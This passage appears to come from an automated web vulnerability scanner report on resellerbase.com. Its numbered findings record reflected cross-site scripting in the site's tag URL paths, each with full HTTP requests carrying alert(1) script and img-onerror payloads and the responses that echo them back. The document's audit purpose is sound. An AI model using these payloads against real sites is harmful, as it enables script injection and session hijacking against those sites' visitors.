GET /tag/resell8f7f2<img%20src%3da%20onerror%3dalert(1)>39fc79e449cf59919?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resell8f7f2<img src=a onerror=alert(1)>39fc79e449cf59919]</td>
...[SNIP]...

2.4351. http://www.resellerbase.com/tag/reseller [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ccaf<script>alert(1)</script>fb1fe5515e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2ccaf<script>alert(1)</script>fb1fe5515e8/reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2ccaf<script>alert(1)</script>fb1fe5515e8/reseller was not found on this server.</p>
...[SNIP]...

2.4352. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3f39<script>alert(1)</script>64e3d926968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf3f39<script>alert(1)</script>64e3d926968/reseller+programs HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf3f39<script>alert(1)</script>64e3d926968/reseller+programs was not found on this server.</p>
...[SNIP]...

2.4353. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae374<script>alert(1)</script>a140fd43494269670 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tagae374<script>alert(1)</script>a140fd43494269670/reseller+programs?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagae374<script>alert(1)</script>a140fd43494269670/reseller+programs?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4354. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a9591</title><img%20src%3da%20onerror%3dalert(1)>467dbece1c8 was submitted in the REST URL parameter 2. This input was echoed as a9591</title><img src=a onerror=alert(1)>467dbece1c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+programsa9591</title><img%20src%3da%20onerror%3dalert(1)>467dbece1c8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller programsa9591</title><img src=a onerror=alert(1)>467dbece1c8</title>
...[SNIP]...

2.4355. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c9da<img%20src%3da%20onerror%3dalert(1)>0e9c277bedb was submitted in the REST URL parameter 2. This input was echoed as 1c9da<img src=a onerror=alert(1)>0e9c277bedb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+programs1c9da<img%20src%3da%20onerror%3dalert(1)>0e9c277bedb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller programs1c9da<img src=a onerror=alert(1)>0e9c277bedb]</td>
...[SNIP]...

2.4356. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f050<img%20src%3da%20onerror%3dalert(1)>f20cbc1c1f49b3159 was submitted in the REST URL parameter 2. This input was echoed as 8f050<img src=a onerror=alert(1)>f20cbc1c1f49b3159 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/reseller+programs8f050<img%20src%3da%20onerror%3dalert(1)>f20cbc1c1f49b3159?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller programs8f050<img src=a onerror=alert(1)>f20cbc1c1f49b3159]</td>
...[SNIP]...

2.4357. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 90c5f</title><img%20src%3da%20onerror%3dalert(1)>499336b491a8fbbe2 was submitted in the REST URL parameter 2. This input was echoed as 90c5f</title><img src=a onerror=alert(1)>499336b491a8fbbe2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/reseller+programs90c5f</title><img%20src%3da%20onerror%3dalert(1)>499336b491a8fbbe2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller programs90c5f</title><img src=a onerror=alert(1)>499336b491a8fbbe2</title>
...[SNIP]...

2.4358. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2da38<script>alert(1)</script>287e45fb6c0701192 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag2da38<script>alert(1)</script>287e45fb6c0701192/reseller+rights?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2da38<script>alert(1)</script>287e45fb6c0701192/reseller+rights?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4359. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b399<script>alert(1)</script>bab8fb68af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8b399<script>alert(1)</script>bab8fb68af4/reseller+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8b399<script>alert(1)</script>bab8fb68af4/reseller+rights was not found on this server.</p>
...[SNIP]...

2.4360. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7d4f3</title><img%20src%3da%20onerror%3dalert(1)>9bc5450c7c8 was submitted in the REST URL parameter 2. This input was echoed as 7d4f3</title><img src=a onerror=alert(1)>9bc5450c7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+rights7d4f3</title><img%20src%3da%20onerror%3dalert(1)>9bc5450c7c8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller rights7d4f3</title><img src=a onerror=alert(1)>9bc5450c7c8</title>
...[SNIP]...

2.4361. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ce07<img%20src%3da%20onerror%3dalert(1)>b4b3111f6c23ee02c was submitted in the REST URL parameter 2. This input was echoed as 5ce07<img src=a onerror=alert(1)>b4b3111f6c23ee02c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/reseller+rights5ce07<img%20src%3da%20onerror%3dalert(1)>b4b3111f6c23ee02c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller rights5ce07<img src=a onerror=alert(1)>b4b3111f6c23ee02c]</td>
...[SNIP]...

2.4362. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dce56<img%20src%3da%20onerror%3dalert(1)>bdfdc249d23 was submitted in the REST URL parameter 2. This input was echoed as dce56<img src=a onerror=alert(1)>bdfdc249d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+rightsdce56<img%20src%3da%20onerror%3dalert(1)>bdfdc249d23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller rightsdce56<img src=a onerror=alert(1)>bdfdc249d23]</td>
...[SNIP]...

2.4363. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f57ba</title><img%20src%3da%20onerror%3dalert(1)>c9b9170b5928d6351 was submitted in the REST URL parameter 2. This input was echoed as f57ba</title><img src=a onerror=alert(1)>c9b9170b5928d6351 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/reseller+rightsf57ba</title><img%20src%3da%20onerror%3dalert(1)>c9b9170b5928d6351?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller rightsf57ba</title><img src=a onerror=alert(1)>c9b9170b5928d6351</title>
...[SNIP]...

2.4364. http://www.resellerbase.com/tag/resellers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 476b5<script>alert(1)</script>2f09305c02f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag476b5<script>alert(1)</script>2f09305c02f/resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag476b5<script>alert(1)</script>2f09305c02f/resellers was not found on this server.</p>
...[SNIP]...

2.4365. http://www.resellerbase.com/tag/resellers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7790<script>alert(1)</script>912be735c6ddcc63d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tagd7790<script>alert(1)</script>912be735c6ddcc63d/resellers?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd7790<script>alert(1)</script>912be735c6ddcc63d/resellers?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4366. http://www.resellerbase.com/tag/resellers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd969<img%20src%3da%20onerror%3dalert(1)>fa780bd9af7 was submitted in the REST URL parameter 2. This input was echoed as bd969<img src=a onerror=alert(1)>fa780bd9af7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellersbd969<img%20src%3da%20onerror%3dalert(1)>fa780bd9af7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellersbd969<img src=a onerror=alert(1)>fa780bd9af7]</td>
...[SNIP]...

2.4367. http://www.resellerbase.com/tag/resellers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 58307</title><img%20src%3da%20onerror%3dalert(1)>a39cc6ac17735b8d2 was submitted in the REST URL parameter 2. This input was echoed as 58307</title><img src=a onerror=alert(1)>a39cc6ac17735b8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/resellers58307</title><img%20src%3da%20onerror%3dalert(1)>a39cc6ac17735b8d2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
